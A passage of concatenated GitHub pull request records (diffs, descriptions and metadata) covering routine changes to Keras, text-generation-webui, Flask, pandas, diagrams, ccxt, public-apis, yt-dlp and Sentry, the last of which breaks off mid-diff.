diff --git a/keras/layers/convolutional.py b/keras/layers/convolutional.py index 3c3c58ea643..264314d1b95 100644 --- a/keras/layers/convolutional.py +++ b/keras/layers/convolutional.py @@ -30,7 +30,7 @@ def __init__(self, input_dim, nb_filter, filter_length, self.subsample_length = subsample_length self.init = initializations.get(init) self.activation = activations.get(activation) - self.subsample = (1, subsample_length) + self.subsample = (subsample_length, 1) self.border_mode = border_mode self.input = T.tensor3()
https://api.github.com/repos/keras-team/keras/pulls/706
2015-09-21T04:01:01Z
2015-10-03T19:07:06Z
2015-10-03T19:07:06Z
2015-10-03T19:07:06Z
169
keras-team/keras
47,043
Update accelerate requirement from ==0.24.* to ==0.25.*
diff --git a/requirements.txt b/requirements.txt index 3d25bfd770..51385e1125 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,4 +1,4 @@ -accelerate==0.24.* +accelerate==0.25.* colorama datasets einops diff --git a/requirements_amd.txt b/requirements_amd.txt index e27f3016e2..4299faa9f9 100644 --- a/requirements_amd.txt +++ b/requirements_amd.txt @@ -1,4 +1,4 @@ -accelerate==0.24.* +accelerate==0.25.* colorama datasets einops diff --git a/requirements_amd_noavx2.txt b/requirements_amd_noavx2.txt index f78832e3f3..60f57b0d04 100644 --- a/requirements_amd_noavx2.txt +++ b/requirements_amd_noavx2.txt @@ -1,4 +1,4 @@ -accelerate==0.24.* +accelerate==0.25.* colorama datasets einops diff --git a/requirements_apple_intel.txt b/requirements_apple_intel.txt index febb0609e6..9ab018292f 100644 --- a/requirements_apple_intel.txt +++ b/requirements_apple_intel.txt @@ -1,4 +1,4 @@ -accelerate==0.24.* +accelerate==0.25.* colorama datasets einops diff --git a/requirements_apple_silicon.txt b/requirements_apple_silicon.txt index 2997c98f32..7cc674bb48 100644 --- a/requirements_apple_silicon.txt +++ b/requirements_apple_silicon.txt @@ -1,4 +1,4 @@ -accelerate==0.24.* +accelerate==0.25.* colorama datasets einops diff --git a/requirements_cpu_only.txt b/requirements_cpu_only.txt index ec0e84ffd0..6eb1d7ba59 100644 --- a/requirements_cpu_only.txt +++ b/requirements_cpu_only.txt @@ -1,4 +1,4 @@ -accelerate==0.24.* +accelerate==0.25.* colorama datasets einops diff --git a/requirements_cpu_only_noavx2.txt b/requirements_cpu_only_noavx2.txt index 02e51844e6..d415370eaa 100644 --- a/requirements_cpu_only_noavx2.txt +++ b/requirements_cpu_only_noavx2.txt @@ -1,4 +1,4 @@ -accelerate==0.24.* +accelerate==0.25.* colorama datasets einops diff --git a/requirements_noavx2.txt b/requirements_noavx2.txt index eeff8eb71d..38d1569b20 100644 --- a/requirements_noavx2.txt +++ b/requirements_noavx2.txt @@ -1,4 +1,4 @@ -accelerate==0.24.* +accelerate==0.25.* colorama datasets einops diff --git a/requirements_nowheels.txt b/requirements_nowheels.txt index d08204fd1c..80a6b65d07 100644 --- a/requirements_nowheels.txt +++ b/requirements_nowheels.txt @@ -1,4 +1,4 @@ -accelerate==0.24.* +accelerate==0.25.* colorama datasets einops
Updates the requirements on [accelerate](https://github.com/huggingface/accelerate) to permit the latest version. <details> <summary>Release notes</summary> <p><em>Sourced from <a href="https://github.com/huggingface/accelerate/releases">accelerate's releases</a>.</em></p> <blockquote> <h2>v0.25.0: safetensors by default, new trackers, and plenty of bug fixes</h2> <h2>Safetensors default</h2> <p>As of this release, <code>safetensors</code> will be the default format saved when applicable! To read more about safetensors and why it's best to use it for safety (and not pickle/torch.save), check it out <a href="https://github.com/huggingface/safetensors">here</a></p> <h2>New Experiment Trackers</h2> <p>This release has two new experiment trackers, ClearML and DVCLive!</p> <p>To use them, just pass <code>clear_ml</code> or <code>dvclive</code> to <code>log_with</code> in the <code>Accelerator</code> init. h/t to <a href="https://github.com/eugen-ajechiloae-clearml"><code>@​eugen-ajechiloae-clearml</code></a> and <a href="https://github.com/dberenbaum"><code>@​dberenbaum</code></a></p> <h2>DeepSpeed</h2> <ul> <li>Accelerate's DeepSpeed integration now supports NPU devices, h/t to <a href="https://github.com/statelesshz"><code>@​statelesshz</code></a></li> <li>DeepSpeed can now be launched via accelerate on single GPU setups</li> </ul> <h2>FSDP</h2> <p>FSDP had a huge refactoring so that the interface when using FSDP is the exact same as every other scenario when using <code>accelerate</code>. No more needing to call <code>accelerator.prepare()</code> twice!</p> <h2>Other useful enhancements</h2> <ul> <li> <p>We now raise and try to disable P2P communications on consumer GPUs for the 3090 series and beyond. Without this users were seeing timeout issues and the like as NVIDIA dropped P2P support. If using <code>accelerate launch</code> we will automatically disable, and if we sense that it is still enabled on distributed setups using 3090's +, we will raise an error.</p> </li> <li> <p>When doing <code>.gather()</code>, if tensors are on different devices we explicitly will raise an error (for now only valid on CUDA)</p> </li> </ul> <h2>Bug fixes</h2> <ul> <li>Fixed a bug that caused dataloaders to not shuffle despite <code>shuffle=True</code> when using multiple GPUs and the new <code>SeedableRandomSampler</code>.</li> </ul> <h2>General Changelog</h2> <ul> <li>Add logs offloading by <a href="https://github.com/SunMarc"><code>@​SunMarc</code></a> in <a href="https://redirect.github.com/huggingface/accelerate/pull/2075">huggingface/accelerate#2075</a></li> <li>Add ClearML tracker by <a href="https://github.com/eugen-ajechiloae-clearml"><code>@​eugen-ajechiloae-clearml</code></a> in <a href="https://redirect.github.com/huggingface/accelerate/pull/2034">huggingface/accelerate#2034</a></li> <li>CRITICAL: fix failing ci by <a href="https://github.com/muellerzr"><code>@​muellerzr</code></a> in <a href="https://redirect.github.com/huggingface/accelerate/pull/2088">huggingface/accelerate#2088</a></li> <li>Fix flag typo by <a href="https://github.com/kuza55"><code>@​kuza55</code></a> in <a href="https://redirect.github.com/huggingface/accelerate/pull/2090">huggingface/accelerate#2090</a></li> <li>Fix batch sampler by <a href="https://github.com/muellerzr"><code>@​muellerzr</code></a> in <a href="https://redirect.github.com/huggingface/accelerate/pull/2097">huggingface/accelerate#2097</a></li> <li>fixed ip address typo by <a href="https://github.com/Fluder-Paradyne"><code>@​Fluder-Paradyne</code></a> in <a href="https://redirect.github.com/huggingface/accelerate/pull/2099">huggingface/accelerate#2099</a></li> <li>Fix memory leak in fp8 causing OOM (and potentially 3x vRAM usage) by <a href="https://github.com/muellerzr"><code>@​muellerzr</code></a> in <a href="https://redirect.github.com/huggingface/accelerate/pull/2089">huggingface/accelerate#2089</a></li> <li>fix warning when offload by <a href="https://github.com/SunMarc"><code>@​SunMarc</code></a> in <a href="https://redirect.github.com/huggingface/accelerate/pull/2105">huggingface/accelerate#2105</a></li> <li>Always use SeedableRandomSampler by <a href="https://github.com/muellerzr"><code>@​muellerzr</code></a> in <a href="https://redirect.github.com/huggingface/accelerate/pull/2110">huggingface/accelerate#2110</a></li> <li>Fix issue with tests by <a href="https://github.com/muellerzr"><code>@​muellerzr</code></a> in <a href="https://redirect.github.com/huggingface/accelerate/pull/2111">huggingface/accelerate#2111</a></li> <li>Make SeedableRandomSampler the default always by <a href="https://github.com/muellerzr"><code>@​muellerzr</code></a> in <a href="https://redirect.github.com/huggingface/accelerate/pull/2117">huggingface/accelerate#2117</a></li> <li>Use &quot;and&quot; instead of comma in Bibtex citation by <a href="https://github.com/qgallouedec"><code>@​qgallouedec</code></a> in <a href="https://redirect.github.com/huggingface/accelerate/pull/2119">huggingface/accelerate#2119</a></li> <li>Add explicit error if empty batch received by <a href="https://github.com/YuryYakhno"><code>@​YuryYakhno</code></a> in <a href="https://redirect.github.com/huggingface/accelerate/pull/2115">huggingface/accelerate#2115</a></li> <li>Allow for ACCELERATE_SEED env var by <a href="https://github.com/muellerzr"><code>@​muellerzr</code></a> in <a href="https://redirect.github.com/huggingface/accelerate/pull/2126">huggingface/accelerate#2126</a></li> <li>add DeepSpeed support for NPU by <a href="https://github.com/statelesshz"><code>@​statelesshz</code></a> in <a href="https://redirect.github.com/huggingface/accelerate/pull/2054">huggingface/accelerate#2054</a></li> <li>Sync states for npu fsdp by <a href="https://github.com/jq460494839"><code>@​jq460494839</code></a> in <a href="https://redirect.github.com/huggingface/accelerate/pull/2113">huggingface/accelerate#2113</a></li> <li>Fix import error when torch&gt;=2.0.1 and torch.distributed is disabled by <a href="https://github.com/natsukium"><code>@​natsukium</code></a> in <a href="https://redirect.github.com/huggingface/accelerate/pull/2121">huggingface/accelerate#2121</a></li> <li>Make safetensors the default by <a href="https://github.com/muellerzr"><code>@​muellerzr</code></a> in <a href="https://redirect.github.com/huggingface/accelerate/pull/2120">huggingface/accelerate#2120</a></li> <li>Raise error when saving with param on meta device by <a href="https://github.com/SunMarc"><code>@​SunMarc</code></a> in <a href="https://redirect.github.com/huggingface/accelerate/pull/2132">huggingface/accelerate#2132</a></li> </ul> <!-- raw HTML omitted --> </blockquote> <p>... (truncated)</p> </details> <details> <summary>Commits</summary> <ul> <li><a href="https://github.com/huggingface/accelerate/commit/d08c23c20975f39393b431143237c193733e7bb8"><code>d08c23c</code></a> Release: v0.25.0</li> <li><a href="https://github.com/huggingface/accelerate/commit/0e48b2358deeb309ff2583884aa46c71c38dcca2"><code>0e48b23</code></a> allow deepspeed without distributed launcher (<a href="https://redirect.github.com/huggingface/accelerate/issues/2204">#2204</a>)</li> <li><a href="https://github.com/huggingface/accelerate/commit/3499cf25aa431ed3eeb7969f1d9b501ef20d0911"><code>3499cf2</code></a> Assemble state dictionary for offloaded models (<a href="https://redirect.github.com/huggingface/accelerate/issues/2156">#2156</a>)</li> <li><a href="https://github.com/huggingface/accelerate/commit/68d63ee15f0faf12429d686b7eca3ee0afb1760d"><code>68d63ee</code></a> unpins dvc (<a href="https://redirect.github.com/huggingface/accelerate/issues/2200">#2200</a>)</li> <li><a href="https://github.com/huggingface/accelerate/commit/151637920d04b1b7aca51b805ec8f3811fffff4c"><code>1516379</code></a> Better error when device mismatches when calling gather() on CUDA (<a href="https://redirect.github.com/huggingface/accelerate/issues/2180">#2180</a>)</li> <li><a href="https://github.com/huggingface/accelerate/commit/0ba3e9bb50589acc35aadc4db792e617070bdd01"><code>0ba3e9b</code></a> Explicitly disable P2P using <code>launch</code>, and pick up in <code>state</code> if a user will ...</li> <li><a href="https://github.com/huggingface/accelerate/commit/b04d36c75f701266048382426b4074e28bfdb67c"><code>b04d36c</code></a> Apply DVC warning to Accelerate (<a href="https://redirect.github.com/huggingface/accelerate/issues/2197">#2197</a>)</li> <li><a href="https://github.com/huggingface/accelerate/commit/5fc1b230d339c6e77179adfe2b74a6b414c9cbbf"><code>5fc1b23</code></a> Pin DVC (<a href="https://redirect.github.com/huggingface/accelerate/issues/2196">#2196</a>)</li> <li><a href="https://github.com/huggingface/accelerate/commit/244122c736141b164242084c659b6dafa4208fea"><code>244122c</code></a> fsdp refactoring (<a href="https://redirect.github.com/huggingface/accelerate/issues/2177">#2177</a>)</li> <li><a href="https://github.com/huggingface/accelerate/commit/d25efa71ce76a5f5911a1fc6c039979d7248596f"><code>d25efa7</code></a> Don't install comet</li> <li>Additional commits viewable in <a href="https://github.com/huggingface/accelerate/compare/v0.24...v0.25.0">compare view</a></li> </ul> </details> <br /> Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`. [//]: # (dependabot-automerge-start) [//]: # (dependabot-automerge-end) --- <details> <summary>Dependabot commands and options</summary> <br /> You can trigger Dependabot actions by commenting on this PR: - `@dependabot rebase` will rebase this PR - `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it - `@dependabot merge` will merge this PR after your CI passes on it - `@dependabot squash and merge` will squash and merge this PR after your CI passes on it - `@dependabot cancel merge` will cancel a previously requested merge and block automerging - `@dependabot reopen` will reopen this PR if it is closed - `@dependabot close` will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually - `@dependabot show <dependency name> ignore conditions` will show all of the ignore conditions of the specified dependency - `@dependabot ignore this major version` will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself) - `@dependabot ignore this minor version` will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself) - `@dependabot ignore this dependency` will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself) </details>
https://api.github.com/repos/oobabooga/text-generation-webui/pulls/4810
2023-12-04T20:57:30Z
2023-12-04T23:36:01Z
2023-12-04T23:36:01Z
2023-12-04T23:36:11Z
813
oobabooga/text-generation-webui
26,109
cache_timeout should be always checked not Null
diff --git a/flask/helpers.py b/flask/helpers.py index 72a961a827..18502a53f0 100644 --- a/flask/helpers.py +++ b/flask/helpers.py @@ -533,7 +533,7 @@ def send_file(filename_or_fp, mimetype=None, as_attachment=False, rv.cache_control.public = True if cache_timeout is None: cache_timeout = current_app.get_send_file_max_age(filename) - if cache_timeout: + if cache_timeout is not None: rv.cache_control.max_age = cache_timeout rv.expires = int(time() + cache_timeout)
I think send_file should always check that cache_timeout is not None to allow for a (I hope legal) value of 0 for such parameter.
https://api.github.com/repos/pallets/flask/pulls/527
2012-06-13T13:44:31Z
2012-06-17T12:56:02Z
2012-06-17T12:56:02Z
2020-11-14T05:52:48Z
136
pallets/flask
20,715
ENH/API: Keep original traceback in DataFrame.apply
diff --git a/doc/source/release.rst b/doc/source/release.rst index bb82a055dcd8d..8fba8618fd860 100644 --- a/doc/source/release.rst +++ b/doc/source/release.rst @@ -262,6 +262,8 @@ See :ref:`Internal Refactoring<whatsnew_0130.refactoring>` if code argument out of range (:issue:`4519`, :issue:`4520`) - Fix reindexing with multiple axes; if an axes match was not replacing the current axes, leading to a possible lazay frequency inference issue (:issue:`3317`) + - Fixed issue where ``DataFrame.apply`` was reraising exceptions incorrectly + (causing the original stack trace to be truncated). pandas 0.12 =========== diff --git a/pandas/core/frame.py b/pandas/core/frame.py index d032bbf66f95e..413cb0b6ef3d0 100644 --- a/pandas/core/frame.py +++ b/pandas/core/frame.py @@ -3632,7 +3632,7 @@ def _apply_standard(self, func, axis, ignore_failures=False, reduce=True): except (NameError, UnboundLocalError): # pragma: no cover # no k defined yet pass - raise e + raise if len(results) > 0 and _is_sequence(results[0]): if not isinstance(results[0], Series):
When "raise <exception instance>" is used inside a try/except block, the original stacktrace (containing the code path that raised the original exception). This makes debugging difficult since all we know is that an error occured when `frame._apply_standard` attempted to call the provided function. Preserve the original stacktrace by using "raise" instead of "raise <exception instance>". This facilitates debugginb by allowing us to see where (in the provided callable) the exception occured.
https://api.github.com/repos/pandas-dev/pandas/pulls/4549
2013-08-13T12:49:27Z
2013-08-21T13:42:36Z
2013-08-21T13:42:36Z
2014-06-19T20:26:24Z
325
pandas-dev/pandas
44,991
docs(readme): fix typo
diff --git a/README.md b/README.md index d2883dd04..004418a21 100644 --- a/README.md +++ b/README.md @@ -75,7 +75,7 @@ To contribute to diagram, check out [contribution guidelines](CONTRIBUTING.md). [GitPitch](https://gitpitch.github.io/gitpitch) is the perfect slide deck solution for Tech Conferences, Training, Developer Advocates, and Educators. Diagrams is now available as a dedicated [Cloud Diagram Markdown Widget](https://docs.gitpitch.com/#/diagrams/cloud-architecture) so you can use Diagrams directly on any slide for conferences, meetups, and training. -[Cloudiscovery](https://github.com/Cloud-Architects/cloudiscovery) helps you to analyze resources in your cloud (AWS/GCP/Azure/Alibaba/IBM) account. It allows you to create a diagram of analyzed cloud resource map based on this Diagrams library, so you can draw the your existing cloud infrastructure with Cloudicovery. +[Cloudiscovery](https://github.com/Cloud-Architects/cloudiscovery) helps you to analyze resources in your cloud (AWS/GCP/Azure/Alibaba/IBM) account. It allows you to create a diagram of analyzed cloud resource map based on this Diagrams library, so you can draw your existing cloud infrastructure with Cloudiscovery. [Airflow Diagrams](https://github.com/feluelle/airflow-diagrams) is an Airflow plugin that aims to easily visualise your Airflow DAGs on service level from providers like AWS, GCP, Azure, etc. via diagrams.
https://api.github.com/repos/mingrammer/diagrams/pulls/496
2021-03-28T07:35:08Z
2021-05-03T14:56:01Z
2021-05-03T14:56:01Z
2021-05-03T14:56:01Z
353
mingrammer/diagrams
52,670
bibox fetchOpenOrders allow wildcard symbol
diff --git a/js/bibox.js b/js/bibox.js index f650a8034332..7a49b19e9a10 100644 --- a/js/bibox.js +++ b/js/bibox.js @@ -3,7 +3,7 @@ // --------------------------------------------------------------------------- const Exchange = require ('./base/Exchange'); -const { ExchangeError, AuthenticationError, DDoSProtection, InvalidOrder } = require ('./base/errors'); +const { ExchangeError, AuthenticationError, DDoSProtection, ExchangeNotAvailable, InvalidOrder } = require ('./base/errors'); // --------------------------------------------------------------------------- @@ -409,7 +409,7 @@ module.exports = class bibox extends Exchange { 'side': side, 'price': price, 'amount': amount, - 'cost': cost ? cost : price * filled, + 'cost': cost ? cost : parseFloat (price) * filled, 'filled': filled, 'remaining': remaining, 'status': status, @@ -432,15 +432,18 @@ module.exports = class bibox extends Exchange { } async fetchOpenOrders (symbol = undefined, since = undefined, limit = undefined, params = {}) { - if (typeof symbol === 'undefined') - throw new ExchangeError (this.id + ' fetchOpenOrders requires a symbol argument'); - await this.loadMarkets (); - let market = this.market (symbol); + let market = undefined; + let pair = undefined; + if (typeof symbol !== 'undefined') { + await this.loadMarkets (); + market = this.market (symbol); + pair = market['id']; + } let size = (limit) ? limit : 200; let response = await this.privatePostOrderpending ({ 'cmd': 'orderpending/orderPendingList', 'body': this.extend ({ - 'pair': market['id'], + 'pair': pair, 'account_type': 0, // 0 - regular, 1 - margin 'page': 1, 'size': size, @@ -565,6 +568,10 @@ module.exports = class bibox extends Exchange { throw new AuthenticationError (message); // invalid api key else if (code === '3025') throw new AuthenticationError (message); // signature failed + else if (code === '4000') + // \u5f53\u524d\u7f51\u7edc\u8fde\u63a5\u4e0d\u7a33\u5b9a\uff0c\u8bf7\u7a0d\u5019\u91cd\u8bd5 + // The current network connection is unstable. Please try again later + throw new ExchangeNotAvailable (message); else if (code === '4003') throw new DDoSProtection (message); // server is busy, try again later } diff --git a/js/kucoin.js b/js/kucoin.js index 5c6e3a5abea3..75eabebad650 100644 --- a/js/kucoin.js +++ b/js/kucoin.js @@ -96,6 +96,7 @@ module.exports = class kucoin extends Exchange { 'post': [ 'account/{coin}/withdraw/apply', 'account/{coin}/withdraw/cancel', + 'account/promotion/draw', 'cancel-order', 'order', 'order/cancel-all',
https://api.github.com/repos/ccxt/ccxt/pulls/1866
2018-02-11T01:11:56Z
2018-02-11T18:59:28Z
2018-02-11T18:59:28Z
2018-02-11T18:59:28Z
758
ccxt/ccxt
13,113
Add API-FOOTBALL
diff --git a/README.md b/README.md index 934004ae8a..39d24a513f 100644 --- a/README.md +++ b/README.md @@ -1152,6 +1152,7 @@ API | Description | Auth | HTTPS | CORS | ### Sports & Fitness API | Description | Auth | HTTPS | CORS | |---|---|---|---|---| +| [API-FOOTBALL](https://www.api-football.com/documentation-v3) | Get information about Football Leagues & Cups | `apiKey` | Yes | Yes | | [ApiMedic](https://apimedic.com/) | ApiMedic offers a medical symptom checker API primarily for patients | `apiKey` | Yes | Unknown | | [balldontlie](https://balldontlie.io) | Balldontlie provides access to stats data from the NBA | No | Yes | Yes | | [Canadian Football League (CFL)](http://api.cfl.ca/) | Official JSON API providing real-time league, team and player statistics about the CFL | `apiKey` | Yes | No |
#2107 <!-- Thank you for taking the time to work on a Pull Request for this project! --> <!-- To ensure your PR is dealt with swiftly please check the following: --> - [x] My submission is formatted according to the guidelines in the [contributing guide](/CONTRIBUTING.md) - [x] My addition is ordered alphabetically - [x] My submission has a useful description - [x] The description does not have more than 100 characters - [x] The description does not end with punctuation - [x] Each table column is padded with one space on either side - [x] I have searched the repository for any relevant issues or pull requests - [x] Any category I am creating has the minimum requirement of 3 items - [x] All changes have been [squashed][squash-link] into a single commit [squash-link]: <https://github.com/todotxt/todo.txt-android/wiki/Squash-All-Commits-Related-to-a-Single-Issue-into-a-Single-Commit>
https://api.github.com/repos/public-apis/public-apis/pulls/2414
2021-10-09T01:22:37Z
2021-10-19T15:03:00Z
2021-10-19T15:02:59Z
2021-10-19T15:03:00Z
240
public-apis/public-apis
35,281
[livestreamfails] Add new extractor
diff --git a/yt_dlp/extractor/_extractors.py b/yt_dlp/extractor/_extractors.py index 37328dfc840..4e3b2ead04e 100644 --- a/yt_dlp/extractor/_extractors.py +++ b/yt_dlp/extractor/_extractors.py @@ -837,6 +837,7 @@ LivestreamOriginalIE, LivestreamShortenerIE, ) +from .livestreamfails import LivestreamfailsIE from .lnkgo import ( LnkGoIE, LnkIE, diff --git a/yt_dlp/extractor/livestreamfails.py b/yt_dlp/extractor/livestreamfails.py new file mode 100644 index 00000000000..d6f626a99c9 --- /dev/null +++ b/yt_dlp/extractor/livestreamfails.py @@ -0,0 +1,34 @@ +from .common import InfoExtractor +from ..utils import format_field, traverse_obj, unified_timestamp + + +class LivestreamfailsIE(InfoExtractor): + _VALID_URL = r'https?://(?:www\.)?livestreamfails\.com/clip/(?P<id>[0-9]+)' + _TESTS = [{ + 'url': 'https://livestreamfails.com/clip/139200', + 'md5': '8a03aea1a46e94a05af6410337463102', + 'info_dict': { + 'id': '139200', + 'ext': 'mp4', + 'display_id': 'ConcernedLitigiousSalmonPeteZaroll-O8yo9W2L8OZEKhV2', + 'title': 'Streamer jumps off a trampoline at full speed', + 'creator': 'paradeev1ch', + 'thumbnail': r're:^https?://.+', + 'timestamp': 1656271785, + 'upload_date': '20220626', + } + }] + + def _real_extract(self, url): + video_id = self._match_id(url) + api_response = self._download_json(f'https://api.livestreamfails.com/clip/{video_id}', video_id) + + return { + 'id': video_id, + 'display_id': api_response.get('sourceId'), + 'timestamp': unified_timestamp(api_response.get('createdAt')), + 'url': f'https://livestreamfails-video-prod.b-cdn.net/video/{api_response["videoId"]}', + 'title': api_response.get('label'), + 'creator': traverse_obj(api_response, ('streamer', 'label')), + 'thumbnail': format_field(api_response, 'imageId', 'https://livestreamfails-image-prod.b-cdn.net/image/%s') + }
<!-- # Please follow the guide below - You will be asked some questions, please read them **carefully** and answer honestly - Put an `x` into all the boxes `[ ]` relevant to your *pull request* (like [x]) - Use *Preview* tab to see how your *pull request* will actually look like --> ### Before submitting a *pull request* make sure you have: - [x] At least skimmed through [contributing guidelines](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#developer-instructions) including [yt-dlp coding conventions](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#yt-dlp-coding-conventions) - [x] [Searched](https://github.com/yt-dlp/yt-dlp/search?q=is%3Apr&type=Issues) the bugtracker for similar pull requests - [x] Checked the code with [flake8](https://pypi.python.org/pypi/flake8) and [ran relevant tests](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#developer-instructions) ### In order to be accepted and merged into yt-dlp each piece of code must be in public domain or released under [Unlicense](http://unlicense.org/). Check one of the following options: - [x] I am the original author of this code and I am willing to release it under [Unlicense](http://unlicense.org/) - [ ] I am not the original author of this code but it is in public domain or released under [Unlicense](http://unlicense.org/) (provide reliable evidence) ### What is the purpose of your *pull request*? - [ ] Fix or improvement to an extractor (Make sure to add/update tests) - [x] New extractor ([Piracy websites will not be accepted](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#is-the-website-primarily-used-for-piracy)) - [ ] Core bug fix/improvement - [ ] New feature (It is strongly [recommended to open an issue first](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#adding-new-feature-or-making-overarching-changes)) --- ### Description of your *pull request* and other information Add an extractor for [Livestreamfails](https://livestreamfails.com/), a Twitch clip mirror site for [r/livestreamfail](https://reddit.com/r/LivestreamFail/).
https://api.github.com/repos/yt-dlp/yt-dlp/pulls/4204
2022-06-27T13:14:13Z
2022-06-29T00:11:38Z
2022-06-29T00:11:38Z
2022-06-29T00:11:38Z
646
yt-dlp/yt-dlp
8,273
feat: Add sentry apps to integration directory
diff --git a/src/sentry/static/sentry/app/views/organizationIntegrations/integrationListDirectory.tsx b/src/sentry/static/sentry/app/views/organizationIntegrations/integrationListDirectory.tsx index 47627e5306ad2..d8b8e56e07d31 100644 --- a/src/sentry/static/sentry/app/views/organizationIntegrations/integrationListDirectory.tsx +++ b/src/sentry/static/sentry/app/views/organizationIntegrations/integrationListDirectory.tsx @@ -24,7 +24,7 @@ import LoadingIndicator from 'app/components/loadingIndicator'; import MigrationWarnings from 'app/views/organizationIntegrations/migrationWarnings'; import PermissionAlert from 'app/views/settings/organization/permissionAlert'; import ProviderRow from 'app/views/organizationIntegrations/integrationProviderRow'; -import SentryAppInstallationDetail from 'app/views/organizationIntegrations/sentryAppInstallationDetail'; +import IntegrationDirectoryApplicationRow from 'app/views/settings/organizationDeveloperSettings/sentryApplicationRow/integrationDirectoryApplicationRow'; import SentryApplicationRow from 'app/views/settings/organizationDeveloperSettings/sentryApplicationRow'; import SentryDocumentTitle from 'app/components/sentryDocumentTitle'; import SentryTypes from 'app/sentryTypes'; @@ -190,15 +190,6 @@ class OrganizationIntegrations extends AsyncComponent< ); }; - handleRemoveAppInstallation = (app: SentryApp): void => { - const appInstalls = this.state.appInstalls.filter(i => i.app.slug !== app.slug); - this.setState({appInstalls}); - }; - - handleAppInstallation = (install: SentryAppInstallation): void => { - this.setState({appInstalls: [install, ...this.state.appInstalls]}); - }; - getAppInstall = (app: SentryApp) => { return this.state.appInstalls.find(i => i.app.slug === app.slug); }; @@ -233,13 +224,7 @@ class OrganizationIntegrations extends AsyncComponent< key={`row-${provider.key}`} data-test-id="integration-row" provider={provider} - orgId={this.props.params.orgId} integrations={integrations} - onInstall={this.onInstall} - onRemove={this.onRemove} - onDisable={this.onDisable} - onReinstall={this.onInstall} - newlyInstalledIntegrationId={this.state.newlyInstalledIntegrationId} /> ); }; @@ -247,7 +232,6 @@ class OrganizationIntegrations extends AsyncComponent< //render either an internal or non-internal app renderSentryApp = (app: SentryApp) => { const {organization} = this.props; - if (app.status === 'internal') { return ( <SentryApplicationRow @@ -261,19 +245,19 @@ class OrganizationIntegrations extends AsyncComponent< /> ); } - - return ( - <SentryAppInstallationDetail - key={`sentry-app-row-${app.slug}`} - data-test-id="integration-row" - api={this.api} - organization={organization} - install={this.getAppInstall(app)} - onAppUninstall={() => this.handleRemoveAppInstallation(app)} - onAppInstall={this.handleAppInstallation} - app={app} - /> - ); + if (app.status === 'published') { + return ( + <IntegrationDirectoryApplicationRow + key={`sentry-app-row-${app.slug}`} + data-test-id="integration-row" + organization={organization} + install={this.getAppInstall(app)} + app={app} + isOnIntegrationPage + /> + ); + } + return null; }; renderIntegration = (integration: AppOrProvider) => { diff --git a/src/sentry/static/sentry/app/views/organizationIntegrations/integrationProviderRow.tsx b/src/sentry/static/sentry/app/views/organizationIntegrations/integrationProviderRow.tsx index 6b8c5409041a2..2025d78ef8bd3 100644 --- a/src/sentry/static/sentry/app/views/organizationIntegrations/integrationProviderRow.tsx +++ b/src/sentry/static/sentry/app/views/organizationIntegrations/integrationProviderRow.tsx @@ -3,28 +3,16 @@ import PropTypes from 'prop-types'; import React from 'react'; import styled from '@emotion/styled'; import Link from 'app/components/links/link'; -import {openIntegrationDetails} from 'app/actionCreators/modal'; import {PanelItem} from 'app/components/panels'; import {t} from 'app/locale'; -import Button from 'app/components/button'; import CircleIndicator from 'app/components/circleIndicator'; -import InstalledIntegration, { - Props as InstalledIntegrationProps, -} from 'app/views/organizationIntegrations/installedIntegration'; import PluginIcon from 'app/plugins/components/pluginIcon'; import SentryTypes from 'app/sentryTypes'; import space from 'app/styles/space'; -import {growDown, highlight} from 'app/styles/animations'; import {IntegrationProvider, Integration} from 'app/types'; type Props = { provider: IntegrationProvider; - orgId: string; - onInstall: (integration: Integration) => void; - onRemove: (integration: Integration) => void; - onDisable: (integration: Integration) => void; - onReinstall: (integration: Integration) => void; - newlyInstalledIntegrationId: string; integrations: Integration[]; }; @@ -32,80 +20,36 @@ export default class ProviderRow extends React.Component<Props> { static propTypes = { provider: PropTypes.object.isRequired, integrations: PropTypes.array.isRequired, - orgId: PropTypes.string.isRequired, - onInstall: PropTypes.func.isRequired, - onRemove: PropTypes.func.isRequired, - onDisable: PropTypes.func.isRequired, - onReinstall: PropTypes.func.isRequired, - newlyInstalledIntegrationId: PropTypes.string, }; static contextTypes = { organization: SentryTypes.Organization, }; - get integrations() { - return this.props.integrations; - } - get isEnabled() { - return this.integrations.length > 0; - } - - // Actions - - openModal = () => { - const organization = this.context.organization; - const provider = this.props.provider; - const onAddIntegration = this.props.onInstall; - openIntegrationDetails({ - provider, - organization, - onAddIntegration, - isInstalled: this.isEnabled, - }); - }; - - // Rendering - - get buttonProps() { - return { - icon: 'icon-circle-add', - children: this.isEnabled ? t('Add Configuration') : t('Install'), - }; - } - - renderIntegrations() { - return this.integrations.map(integration => ( - <StyledInstalledIntegration - key={integration.id} - organization={this.context.organization} - provider={this.props.provider} - integration={integration} - onRemove={this.props.onRemove} - onDisable={this.props.onDisable} - onReinstallIntegration={this.props.onReinstall} - data-test-id={integration.id} - newlyAdded={integration.id === this.props.newlyInstalledIntegrationId} - /> - )); + return this.props.integrations.length > 0; } render() { + const {provider, integrations} = this.props; + const { + organization: {slug}, + } = this.context; return ( - <PanelItem p={0} flexDirection="column" data-test-id={this.props.provider.key}> + <PanelItem p={0} flexDirection="column" data-test-id={provider.key}> <Flex style={{alignItems: 'center', padding: '16px'}}> - <PluginIcon size={36} pluginId={this.props.provider.key} /> + <PluginIcon size={36} pluginId={provider.key} /> <div style={{flex: '1', padding: '0 16px'}}> - <ProviderName>{this.props.provider.name}</ProviderName> + <ProviderName to={`/settings/${slug}/integrations/${provider.key}`}> + {provider.name} + </ProviderName> <ProviderDetails> <Status enabled={this.isEnabled} /> - <StyledLink>{`${this.props.integrations.length} Configurations`}</StyledLink> + <StyledLink + to={`/settings/${slug}/integrations/${provider.key}?tab=configurations`} + >{`${integrations.length} Configurations`}</StyledLink> </ProviderDetails> </div> - <div> - <Button size="small" 